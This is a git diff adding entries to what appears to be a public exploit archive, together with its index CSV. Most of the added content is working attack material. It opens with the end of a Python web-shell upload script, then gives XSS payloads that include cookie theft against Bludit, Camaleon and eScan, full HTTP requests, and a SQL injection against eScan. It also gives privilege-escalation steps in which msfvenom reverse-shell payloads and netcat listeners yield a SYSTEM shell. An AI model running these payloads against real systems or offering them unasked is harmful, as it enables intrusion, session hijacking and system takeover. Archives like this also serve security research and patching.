+ headers = set_cookies(username, version, apikey)
+
+ nonce = get_csrf_token(target, path, headers)
+ if not nonce:
+ print("(-) could not get nonce")
+ return
+
+ upload_shell(target, path, headers, nonce, shell_content)
+ shell_trigger(target, path)
+
+if __name__ == '__main__':
+ print_the_banner()
+ main()
\ No newline at end of file
diff --git a/exploits/php/webapps/51476.txt b/exploits/php/webapps/51476.txt
new file mode 100644
index 000000000..2589ae124
--- /dev/null
+++ b/exploits/php/webapps/51476.txt
@@ -0,0 +1,64 @@
+# Exploit Title: Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated)
+# Date: 2023-04-15
+# Exploit Author: Rahad Chowdhury
+# Vendor Homepage: https://www.bludit.com/
+# Software Link: https://github.com/bludit/bludit/releases/tag/3.14.1
+# Version: 3.14.1
+# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53
+# CVE: CVE-2023-31698
+
+SVG Payload
+-------------
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
+http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400
+"/>
+<script type="text/javascript">
+alert(document.domain);
+</script>
+</svg>
+
+save this SVG file xss.svg
+
+Steps to Reproduce:
+
+1. At first login your admin panel.
+2. then go to settings and click the logo section.
+3. Now upload xss.svg file so your request data will be
+
+POST /bludit/admin/ajax/logo-upload HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
+Gecko/20100101 Firefox/112.0
+Content-Type: multipart/form-data;
+boundary=---------------------------15560729415644048492005010998
+Referer: http://127.0.0.1/bludit/admin/settings
+Cookie: BLUDITREMEMBERUSERNAME=admin;
+BLUDITREMEMBERTOKEN=139167a80807781336bc7484552bc985;
+BLUDIT-KEY=tmap19d0m813e8rqfft8rsl74i
+Content-Length: 651
+
+-----------------------------15560729415644048492005010998
+Content-Disposition: form-data; name="tokenCSRF"
+
+626c201693546f472cdfc11bed0938aab8c6e480
+-----------------------------15560729415644048492005010998
+Content-Disposition: form-data; name="inputFile"; filename="xss.svg"
+Content-Type: image/svg+xml
+
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
+http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400
+"/>
+<script type="text/javascript">
+alert(document.domain);
+</script>
+</svg>
+
+-----------------------------15560729415644048492005010998--
+
+4. Now open the logo image link that you upload. You will see XSS pop up.
\ No newline at end of file
diff --git a/exploits/php/webapps/51477.txt b/exploits/php/webapps/51477.txt
new file mode 100644
index 000000000..65f9de02b
--- /dev/null
+++ b/exploits/php/webapps/51477.txt
@@ -0,0 +1,17 @@
+# Exploit Title: ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated)
+# Date: 2023-04-17
+# Exploit Author: Rahad Chowdhury
+# Vendor Homepage: http://churchcrm.io/
+# Software Link: https://github.com/ChurchCRM/CRM/releases/tag/4.5.4
+# Version: 4.5.4
+# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53
+# CVE: CVE-2023-31699
+
+Steps to Reproduce:
+
+1. At first login your admin panel.
+2. Then click the "Admin" menu and click "CSV Import '' and you will get
+the CSV file uploader option.
+3. now insert xss payload in jpg file using exiftool or from image
+properties and then upload the jpg file.
+4. you will see XSS pop up.
\ No newline at end of file
diff --git a/exploits/php/webapps/51478.txt b/exploits/php/webapps/51478.txt
new file mode 100644
index 000000000..d487ef58d
--- /dev/null
+++ b/exploits/php/webapps/51478.txt
@@ -0,0 +1,27 @@
+# Exploit Title: CiviCRM 5.59.alpha1 - Stored XSS (Cross-Site Scripting)
+# Date: 2023-02-02
+# Exploit Author: Andrea Intilangelo
+# Vendor Homepage: https://civicrm.org
+# Software Link: https://civicrm.org/download
+# Version: 5.59.alpha1, 5.58.0 (and earlier), 5.57.3 (and earlier)
+# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 109.0.1, Microsoft Edge 109.0.1518.70)
+# CVE: CVE-2023-25440
+Vendor Security Advisory: CIVI-SA-2023-05
+
+
+Description:
+
+A stored cross-site scripting (XSS) vulnerability in CiviCRM 5.59.alpha1 allows attacker to execute arbitrary web
+scripts or HTML.
+
+Injecting persistent javascript code inside the "Add Contact" function while creating a contact, in first/second name
+field, it will be triggered once page gets loaded.
+
+
+Steps to reproduce:
+
+- Quick Add contact to CiviCRM,
+- Insert a payload PoC inside the field(s)
+- Click on 'Add contact'.
+
+If a user visits the dashboard, as well as "Recently added" box, the javascript code will be rendered.
\ No newline at end of file
diff --git a/exploits/ruby/webapps/51446.txt b/exploits/ruby/webapps/51446.txt
new file mode 100644
index 000000000..f936d77a5
--- /dev/null
+++ b/exploits/ruby/webapps/51446.txt
@@ -0,0 +1,55 @@
+# Exploit Title: Authenticated Persistent XSS in Cameleon CMS 2.7.4
+# Google Dork: intext:"Camaleon CMS is a free and open-source tool and
+a fexible content management system (CMS) based on Ruby on Rails"
+# Date: 2023-10-05
+# Exploit Author: Yasin Gergin
+# Vendor Homepage: http://camaleon.tuzitio.com
+# Software Link: https://github.com/owen2345/camaleon-cms
+# Version: 2.7.4
+# Tested on: Linux kali 6.1.0-kali7-amd64
+# CVE : -
+
+--- Description ---
+
+http://127.0.0.1:3000/admin/login - Login as a Admin
+
+Under Post tab click on "Create New"
+
+While creating the post set Title as "><svg/onmouseover=alert(document.cookie)>
+
+http://127.0.0.1:3000/admin/post_type/2/posts - Post data will be sent
+to this url
+
+-- POST DATA --
+
+POST /admin/post_type/2/posts HTTP/1.1
+
+Host: 127.0.0.1:3000
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
+Firefox/102.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Referer: http://127.0.0.1:3000/admin/post_type/2/posts/new
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 666
+Origin: http://127.0.0.1:3000
+Connection: keep-alive
+Cookie:
+_my_project_session=w4yj2Y%2FqHaXYDhwwBDnYsyQUc6AtLUnItJ3MGHBV1yS40xwTgjfvlBZVNgqKIvg1W58e0mxyW4OcBk0XwJRZ90j6SmCHG1KJG9ppBKk%2FdKGDboPCRBq40qKhHnkssRPCgRgIjs69EG7htSdUY%2Bbgit9XTESgvSusBBhsIED%2BLH0VBOBL6H%2FV4Mp59NEP7LhP%2FHmlulEa7I43J8HKpStDj2HiXxA5ZghvSkvpfQpN2d047jLhl71CUcW7pHxmJ4uAdY5ip5OTIhJG9TImps5TbIUrOHyE9vKp1LXzdmbNNi2GI5utUUsURLGUtaN7Fam3Kpi8IqEaBA%3D%3D--8ZKl2%2F6OzLCXn2qA--%2BtMhAwdbdfxNzoSPajkZrg%3D%3D;
+auth_token=iRDUqXfbhmibLIM5mrHelQ&Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A102.0%29+Gecko%2F20100101+Firefox%2F102.0&127.0.0.1;
+phpMyAdmin=4f5ad7484490645a49d171c03e15dab2; pma_lang=en
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+
+authenticity_token=vuAzhnu6UocDR6zpeeaQxvlVjdmIMr9LPrLEcK5FGVAEYQamLHI1fAG7jBQ3FwEX_ACWedzoX72WAUxqj5wKrQ&post%5Bdraft_id%5D=&post%5Bslug%5D=svgonmouseoveralertdocumentcookie&meta%5Bslug%5D=svgonmouseoveralertdocumentcookie&post%5Btitle%5D=%22%3E%3Csvg%2Fonmouseover%3Dalert%28document.cookie%29%3E&post%5Bcontent%5D=%3Cp%3Eqwe%3C%2Fp%3E&meta%5Bsummary%5D=qwe&options%5Bseo_title%5D=&options%5Bkeywords%5D=&options%5Bseo_description%5D=&options%5Bseo_author%5D=&options%5Bseo_image%5D=&options%5Bseo_canonical%5D=&commit=Create&post%5Bstatus%5D=published&meta%5Btemplate%5D=&meta%5Bhas_comments%5D=0&meta%5Bhas_comments%5D=1&categories%5B%5D=6&tags=&meta%5Bthumb%5D=
+
+-- POST DATA --
+
+Then view the post you've created by clicking on "View Page" move your
+mouse cursor onto post title. XSS will popup.
\ No newline at end of file
diff --git a/exploits/windows/local/51453.txt b/exploits/windows/local/51453.txt
new file mode 100644
index 000000000..561417d2b
--- /dev/null
+++ b/exploits/windows/local/51453.txt
@@ -0,0 +1,91 @@
+# Exploit Title: Trend Micro OfficeScan Client 10.0 - ACL Service LPE
+# Date: 2023/05/04
+# Exploit Author: msd0pe
+# Vendor Homepage: https://www.trendmicro.com
+# My Github: https://github.com/msd0pe-1
+
+
+Trend Micro OfficeScan Client:
+Versions =< 10.0 contains wrong ACL rights on the OfficeScan client folder which allows attackers to escalate privileges to the system level through the services. This vulnerabily does not need any privileges access.
+
+[1] Verify the folder rights:
+ > icacls "C:\Program Files (x86)\Trend Micro\OfficeScan Client"
+
+ C:\Program Files (x86)\Trend Micro\OfficeScan Client NT SERVICE\TrustedInstaller:(F)
+ NT SERVICE\TrustedInstaller:(CI)(IO)(F)
+ NT AUTHORITY\SYSTEM:(F)
+ NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
+ BUILTIN\Administrators:(F)
+ BUILTIN\Administrators:(OI)(CI)(IO)(F)
+ BUILTIN\Users:(F)
+ BUILTIN\Users:(OI)(CI)(IO)(F)
+ CREATOR OWNER:(OI)(CI)(IO)(F)
+ APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(RX)
+ APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(IO)
+
+[2] Get informations about the services:
+ > sc qc tmlisten
+
+ [SC] QueryServiceConfig SUCCESS
+
+ SERVICE_NAME: tmlisten
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\tmlisten.exe"
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : OfficeScan NT Listener
+ DEPENDENCIES : Netman
+ : WinMgmt
+ SERVICE_START_NAME : LocalSystem
+
+OR
+
+ > sc qc ntrtscan
+
+ SERVICE_NAME: ntrtscan
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\ntrtscan.exe"
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : OfficeScan NT RealTime Scan
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+[3] Generate a reverse shell:
+ > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o tmlisten.exe
+
+ OR
+
+ > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o ntrtscan.exe
+
+[4] Upload the reverse shell to C:\Program Files(x86)\Trend Micro\OfficeScan Client\tmlisten.exe OR C:\Program Files(x86)\Trend Micro\OfficeScan Client\ntrtscan.exe
+
+[5] Start listener
+ > nc -lvp 4444
+
+[6] Reboot the service/server
+ > sc stop tmlisten
+ > sc start tmlisten
+
+ OR
+
+ > sc stop ntrtscan
+ > sc start ntrtscan
+
+ OR
+
+ > shutdown /r
+
+[7] Enjoy !
+ 192.168.1.102: inverse host lookup failed: Unknown host
+ connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
+ Microsoft Windows [Version 10.0.19045.2130]
+ (c) Microsoft Corporation. All rights reserved.
+
+ C:\Windows\system32>whoami
+
+ nt authority\system
\ No newline at end of file
diff --git a/exploits/windows/local/51461.txt b/exploits/windows/local/51461.txt
new file mode 100644
index 000000000..5de9dbfd9
--- /dev/null
+++ b/exploits/windows/local/51461.txt
@@ -0,0 +1,48 @@
+*#Exploit Title:* Hubstaff 1.6.14-61e5e22e - 'wow64log' DLL Search Order Hijacking
+*#Date:* 14/05/2023
+*#Exploit Author:* Ahsan Azad
+*#Vendor Homepage:* https://hubstaff.com/
+*#Software Link:* https://app.hubstaff.com/download
+*#Version:* 1.6.13, 1.6.14
+*#Tested On:* 64-bit operating system, x64-based processor
+
+*Description*
+Hubstaff is an employee work tracker with screenshots, timesheets, billing,
+in-depth reports, and more.
+
+During testing. It was found that the system32 subdirectory was missing a
+DLL library with the name *wow64log.dll* that had been required by the
+hubstaff's setup file during installation. Hence, using Metasploit's
+msfvenom to create a new wow64log.dll file, Tester was able to get a
+reverse shell locally.
+
+
+*Exploit*
+1- Generate a dll file with the name wow64log.dll using the command:
+
+*msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f dll
+-o wow64log.dll*
+
+2- Place the newly generated DLL to the *system32 *directory.
+3- Start a listener on attacker's console using:
+
+*nc -lnvp <port_used_while_generating_DLL>*
+
+4- Launch the exe.
+
+Reverse shell will be receive as:
+
+
+*C:\Windows>*
+
+
+
+*Attachments (For the understanding of verification team)*
+1.png - Showing the wow64.dll was not found by the exe. [image: 1.png]
+
+2.png - Showing how tester was able to generate a new dll using msfvenom on
+port 1337.
+[image: 2.png]
+
+3.png - Showing a reverse connection received on the attacker's console
+at C:\Windows> by launching the exe.[image: 3.png]
\ No newline at end of file
diff --git a/exploits/windows/local/51479.txt b/exploits/windows/local/51479.txt
new file mode 100644
index 000000000..a51317cad
--- /dev/null
+++ b/exploits/windows/local/51479.txt
@@ -0,0 +1,53 @@
+# Exploit Title :MobileTrans 4.0.11 - Weak Service Privilege Escalation
+# Date: 20 May 2023
+# Exploit Author: Thurein Soe
+# Vendor Homepage: https://mobiletrans.wondershare.com/
+# Software Link:
+https://mega.nz/file/0Et0ybRS#l69LRlvwrwmqDfPGKl_HaJ5LmbeKJu_wH0xYKD8nSVg
+# Version: MobileTrans version 4.0.11
+# Tested on: Window 10 (Version 10.0.19045.2965)
+# CVE : CVE-2023-31748
+
+
+
+Vulnerability Description:
+
+MobileTrans is World 1 mobile-to-mobile file transfer
+application.MobileTrans version 4.0.11 was being suffered a weak service
+permission vulnerability that allows a normal window user to elevate to
+local admin. The "ElevationService" service name was installed, while the
+MobileTrans version 4.0.11 was installed in the window operating system.
+The service "ElevationService" allows the local user to elevate to the
+local admin as The "ElevationService" run with system privileges.
+Effectively, the local user is able to elevate to local admin upon
+successfully modifying the service or replacing the affected executable.
+
+C:\Users\HninKayThayar\Desktop>sc qc ElevationService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: ElevationService
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files
+(x86)\Wondershare\MobileTrans\ElevationService.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Wondershare Driver Install Service help
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+C:\Users\HninKayThayar\Desktop>cacls "C:\Program Files
+(x86)\Wondershare\MobileTrans\ElevationService.exe"
+C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe
+ Everyone:(ID)F
+ NT
+AUTHORITY\SYSTEM:(ID)F
+
+BUILTIN\Administrators:(ID)F
+
+BUILTIN\Users:(ID)R
+
+APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R
+
+APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R
\ No newline at end of file
diff --git a/exploits/windows/webapps/51466.txt b/exploits/windows/webapps/51466.txt
new file mode 100644
index 000000000..abd027186
--- /dev/null
+++ b/exploits/windows/webapps/51466.txt
@@ -0,0 +1,23 @@
+# Exploit Title: eScan Management Console 14.0.1400.2281 - SQL Injection (Authenticated)
+# Date: 16/05/2023
+# Exploit Author: Sahil Ojha
+# Vendor Homepage: https://www.escanav.com
+# Software Link: https://cl.escanav.com/ewconsole.dll
+# Version: 14.0.1400.2281
+# Tested on: Windows
+# CVE : CVE-2023-31702
+
+*Step of Reproduction/Proof of concept(POC)*
+
+1. Login into the escan management console with a valid username and
+password as root user.
+2. Navigate to URL:
+https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1&cnt=4176
+3. Inject the payload into the UsrId parameter to confirm the SQL
+injection as shown below:
+https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1;WAITFOR
+DELAY '0:0:5'--&cnt=4176
+4. The time delay of 5 seconds confirmed that "UsrId" parameter was
+vulnerable to SQL Injection. Furthermore, it was also possible to dump
+all the databases and inject OS shell directly into the MS SQL Server
+using SQLMap tool.
\ No newline at end of file
diff --git a/exploits/windows/webapps/51467.txt b/exploits/windows/webapps/51467.txt
new file mode 100644
index 000000000..8eba64c60
--- /dev/null
+++ b/exploits/windows/webapps/51467.txt
@@ -0,0 +1,19 @@
+# Exploit Title: eScan Management Console 14.0.1400.2281 - Cross Site Scripting
+# Date: 2023-05-16
+# Exploit Author: Sahil Ojha
+# Vendor Homepage: https://www.escanav.com
+# Software Link: https://cl.escanav.com/ewconsole.dll
+# Version: 14.0.1400.2281
+# Tested on: Windows
+# CVE : CVE-2023-31703
+
+*Step of Reproduction/ Proof of Concept(POC)*
+
+1. Login into the eScan Management Console with a valid user credential.
+2. Navigate to URL:
+https://cl.escanav.com/ewconsole/ewconsole.dll/editUserName?usrid=4&from=banner&P=
+3. Now, Inject the Cross Site Scripting Payload in "from" parameter as
+shown below and a valid XSS pop up appeared.
+https://cl.escanav.com/ewconsole/ewconsole.dll/editUserName?usrid=4&from="><script>alert(document.cookie)</script>banner&P=
+4. By exploiting this vulnerability, any arbitrary attacker could have
+stolen an admin user session cookie to perform account takeover.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index f0fd6053a..9d9bbe31f 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -3802,6 +3802,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
27892,exploits/hardware/remote/27892.txt,"obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - help Script Cross-Site Scripting",2006-05-17,"Jaime Blasco",remote,hardware,,2006-05-17,2013-08-27,1,CVE-2006-2490;OSVDB-25621,,,,,https://www.securityfocus.com/bid/18022/info
20892,exploits/hardware/remote/20892.txt,"Olicom XLT-F XL 80 IM V5.5BL2 - Undocumented Community String",2001-03-25,"Jacek Lipkowski",remote,hardware,,2001-03-25,2012-08-28,1,CVE-2001-0380;OSVDB-8817,,,,,https://www.securityfocus.com/bid/2802/info
50996,exploits/hardware/remote/50996.txt,"Omnia MPX 1.5.0+r1 - Path Traversal",2022-08-01,"Momen Eldawakhly",remote,hardware,,2022-08-01,2022-08-01,0,,,,,,
+51444,exploits/hardware/remote/51444.txt,"Optoma 1080PSTX Firmware C02 - Authentication Bypass",2023-05-23,"Anthony Cole",remote,hardware,,2023-05-23,2023-05-23,0,CVE-2023-27823,,,,,
8096,exploits/hardware/remote/8096.txt,"Optus/Huawei E960 HSDPA Router - Sms Cross-Site Scripting",2009-02-23,"Rizki Wicaksono",remote,hardware,,2009-02-22,,1,OSVDB-52370,,,,,
21699,exploits/hardware/remote/21699.txt,"Orinoco OEM Residential Gateway - SNMP Community String Remote Configuration",2002-08-09,"Foundstone Inc.",remote,hardware,,2002-08-09,2012-10-03,1,CVE-2002-0812;OSVDB-11315,,,,,https://www.securityfocus.com/bid/5436/info
51306,exploits/hardware/remote/51306.txt,"Osprey Pump Controller 1.0.1 - (eventFileSelected) Command Injection",2023-04-06,LiquidWorm,remote,hardware,,2023-04-06,2023-04-06,0,,,,,,
@@ -3860,6 +3861,12 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
39522,exploits/hardware/remote/39522.txt,"Schneider Electric SBO / AS - Multiple Vulnerabilities",2016-03-03,"Karn Ganeshen",remote,hardware,,2016-03-03,2016-03-03,0,CVE-2016-2278,,,,,https://ics-cert.us-cert.gov/advisories/ICSA-16-061-01
50987,exploits/hardware/remote/50987.ps1,"Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) - Remote Code Execution",2022-07-29,LiquidWorm,remote,hardware,,2022-07-29,2022-07-29,0,,,,,,
51320,exploits/hardware/remote/51320.txt,"Schneider Electric v1.0 - Directory traversal & Broken Authentication",2023-04-07,"Parsa Rezaie Khiabanloo",remote,hardware,,2023-04-07,2023-04-08,0,,,,,,
+51455,exploits/hardware/remote/51455.py,"Screen SFT DAB 600/C - Authentication Bypass Account Creation",2023-05-23,LiquidWorm,remote,hardware,,2023-05-23,2023-05-23,0,,,,,,
+51458,exploits/hardware/remote/51458.py,"Screen SFT DAB 600/C - Authentication Bypass Admin Password Change",2023-05-23,LiquidWorm,remote,hardware,,2023-05-23,2023-05-23,0,,,,,,
+51457,exploits/hardware/remote/51457.py,"Screen SFT DAB 600/C - Authentication Bypass Erase Account",2023-05-23,LiquidWorm,remote,hardware,,2023-05-23,2023-05-23,0,,,,,,
+51456,exploits/hardware/remote/51456.py,"Screen SFT DAB 600/C - Authentication Bypass Password Change",2023-05-23,LiquidWorm,remote,hardware,,2023-05-23,2023-05-23,0,,,,,,
+51459,exploits/hardware/remote/51459.py,"Screen SFT DAB 600/C - Authentication Bypass Reset Board Config",2023-05-23,LiquidWorm,remote,hardware,,2023-05-23,2023-05-23,0,,,,,,
+51460,exploits/hardware/remote/51460.txt,"Screen SFT DAB 600/C - Unauthenticated Information Disclosure (userManager.cgx)",2023-05-23,LiquidWorm,remote,hardware,,2023-05-23,2023-05-23,0,,,,,,
50936,exploits/hardware/remote/50936.txt,"SDT-CW3B1 1.1.0 - OS Command Injection",2022-05-17,"Ahmed Alroky",remote,hardware,,2022-05-17,2022-05-17,0,CVE-2021-46422,,,,,
37184,exploits/hardware/remote/37184.py,"Seagate Central 2014.0410.0026-F - Remote Command Execution",2015-06-03,"Jeremy Brown",remote,hardware,,2015-06-04,2016-12-04,0,OSVDB-122937,,,,,
43659,exploits/hardware/remote/43659.md,"Seagate Personal Cloud - Multiple Vulnerabilities",2018-01-11,SecuriTeam,remote,hardware,,2018-01-16,2018-01-16,0,CVE-2018-5347,,,,,https://blogs.securiteam.com/index.php/archives/3548
@@ -4628,6 +4635,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
46581,exploits/hardware/webapps/46581.txt,"PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Request Forgery",2019-03-20,"Kumar Saurav",webapps,hardware,80,2019-03-20,2019-03-20,0,CVE-2019-6282,"Cross-Site Request Forgery (CSRF)",,,,https://0dayfindings.home.blog/2019/01/15/plc-wireless-router-gpn2-4p21-c-cn-cross-site-request-forgery-csrf/
46580,exploits/hardware/webapps/46580.txt,"PLC Wireless Router GPN2.4P21-C-CN - Incorrect Access Control",2019-03-20,"Kumar Saurav",webapps,hardware,80,2019-03-20,2019-03-20,0,CVE-2019-6279,"Authentication Bypass / Credentials Bypass (AB/CB)",,,,https://0dayfindings.home.blog/2019/01/15/plc-wireless-router-gpn2-4p21-c-cn-incorrect-access-control/
48757,exploits/hardware/webapps/48757.txt,"PNPSCADA 2.200816204020 - 'interf' SQL Injection (Authenticated)",2020-08-20,"İsmail ERKEK",webapps,hardware,,2020-08-20,2020-08-20,0,,,,,,
+51448,exploits/hardware/webapps/51448.txt,"PnPSCADA v2.x - Unauthenticated PostgreSQL Injection",2023-05-23,"Momen Eldawakhly",webapps,hardware,,2023-05-23,2023-05-23,0,CVE-2023-1934,,,,,
17377,exploits/hardware/webapps/17377.txt,"Polycom IP Phone - Web Interface Data Disclosure",2011-06-09,"Yakir Wizman",webapps,hardware,,2011-06-09,2011-06-09,0,OSVDB-73117,,,,,
37449,exploits/hardware/webapps/37449.txt,"Polycom RealPresence Resource Manager < 8.4 - Multiple Vulnerabilities",2015-06-30,"SEC Consult",webapps,hardware,,2015-06-30,2015-06-30,0,CVE-2015-4685;CVE-2015-4684;CVE-2015-4683;CVE-2015-4682;CVE-2015-4681;OSVDB-123783;OSVDB-123782;OSVDB-123780;OSVDB-123779;OSVDB-123778;OSVDB-123776,,,,,
41175,exploits/hardware/webapps/41175.txt,"Polycom VVX Web Interface - Change Admin Password",2017-01-26,"Mike Brown",webapps,hardware,,2017-01-26,2017-01-26,0,,,,,,
@@ -10304,6 +10312,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
11029,exploits/multiple/local/11029.txt,"DirectAdmin 1.33.6 - Symlink Security Bypass",2010-01-06,alnjm33,local,multiple,,2010-01-05,,0,,,,,,
8067,exploits/multiple/local/8067.txt,"Enomaly ECP / Enomalism < 2.2.1 - Multiple Local Vulnerabilities",2009-02-16,"Sam Johnston",local,multiple,,2009-02-15,,1,CVE-2009-0390,,,,,
10326,exploits/multiple/local/10326.txt,"Ghostscript < 8.64 - 'gdevpdtb.c' Local Buffer Overflow",2009-02-03,"Wolfgang Hamann",local,multiple,,2009-02-02,2017-07-14,0,,,2009-12-05-34340.ps,,,
+51469,exploits/multiple/local/51469.txt,"Gin Markdown Editor v0.7.4 (Electron) - Arbitrary Code Execution",2023-05-23,8bitsec,local,multiple,,2023-05-23,2023-05-23,0,CVE-2023-31873,,,,,
19430,exploits/multiple/local/19430.txt,"GNU groff 1.11 a / HP-UX 10.0/11.0 / SGI IRIX 6.5.3 - Malicious Manpage",1999-07-25,"Pawel Wilk",local,multiple,,1999-07-25,2012-06-27,1,OSVDB-83457,,,,,https://www.securityfocus.com/bid/540/info
24923,exploits/multiple/local/24923.txt,"Google AD Sync Tool - Exposure of Sensitive Information",2013-04-08,"Sense of Security",local,multiple,,2013-04-08,2013-04-08,0,OSVDB-91982,,,,,http://www.senseofsecurity.com.au/advisories/SOS-13-001.pdf
39656,exploits/multiple/local/39656.py,"Hexchat IRC Client 2.11.0 - Directory Traversal",2016-04-04,PizzaHatHacker,local,multiple,,2016-04-04,2016-04-04,0,CVE-2016-2087,,,,http://www.exploit-db.comhexchat-2.10.0.tar.xz,
@@ -10441,6 +10450,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
45697,exploits/multiple/local/45697.txt,"xorg-x11-server < 1.20.3 - Local Privilege Escalation",2018-10-25,"Hacker Fantastic",local,multiple,,2018-10-26,2018-10-26,0,CVE-2018-14665,,,,,https://twitter.com/hackerfantastic/status/1055517801224396800
9985,exploits/multiple/local/9985.txt,"Xpdf 3.01 - Local Heap Overflow / Null Pointer Dereference",2009-10-17,"Adam Zabrocki",local,multiple,,2009-10-16,,1,,,,,,
9097,exploits/multiple/local/9097.txt,"xscreensaver 5.01 - Arbitrary File Disclosure Symlink",2009-07-09,kingcope,local,multiple,,2009-07-08,,1,OSVDB-55971,,,,,
+51470,exploits/multiple/local/51470.txt,"Yank Note v3.52.1 (Electron) - Arbitrary Code Execution",2023-05-23,8bitsec,local,multiple,,2023-05-23,2023-05-23,0,CVE-2023-31874,,,,,
50504,exploits/multiple/local/50504.c,"zlog 1.2.15 - Buffer Overflow",2021-11-08,LIWEI,local,multiple,,2021-11-08,2021-11-08,0,,,,,http://www.exploit-db.comzlog-1.2.15.tar.gz,
32945,exploits/multiple/remote/32945.txt,"010 Editor 3.0.4 - File Parsing Multiple Buffer Overflow Vulnerabilities",2009-04-21,"Le Duc Anh",remote,multiple,,2009-04-21,2014-04-22,1,OSVDB-53926;OSVDB-53925,,,,,https://www.securityfocus.com/bid/34662/info
24730,exploits/multiple/remote/24730.txt,"04webserver 1.42 - Multiple Vulnerabilities",2004-11-10,"Tan Chew Keong",remote,multiple,,2004-11-10,2013-03-12,1,,,,,,https://www.securityfocus.com/bid/11652/info
@@ -11551,6 +11561,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
42324,exploits/multiple/webapps/42324.py,"Apache Struts 2.3.x Showcase - Remote Code Execution",2017-07-07,"Vex Woo",webapps,multiple,,2017-07-14,2018-05-17,1,CVE-2017-9791;S2-048,,s2-048;Struts-048,,,https://github.com/nixawk/labs/blob/943764ccb3b36a419729062f23972fd0d726bd24/CVE-2017-9791/exploit_S2-048.py
44583,exploits/multiple/webapps/44583.txt,"Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection",2014-01-14,"Takeshi Terada",webapps,multiple,,2018-05-03,2018-05-03,1,CVE-2013-2251,,,,,
50072,exploits/multiple/webapps/50072.py,"Apache Superset 1.1.0 - Time-Based Account Enumeration",2021-06-30,"Dolev Farhi",webapps,multiple,,2021-06-30,2021-06-30,0,,,,,,
+51447,exploits/multiple/webapps/51447.py,"Apache Superset 2.0.0 - Authentication Bypass",2023-05-23,MaanVader,webapps,multiple,,2023-05-23,2023-05-23,0,CVE-2023-27524,,,,,
48143,exploits/multiple/webapps/48143.py,"Apache Tomcat - AJP 'Ghostcat File Read/Inclusion",2020-02-20,YDHCUI,webapps,multiple,,2020-02-27,2020-03-02,0,CVE-2020-1938,,,,,https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi/blob/8bd38f4cf22331ecf4e48096a78c5931509c26be/CNVD-2020-10487-Tomcat-Ajp-lfi.py
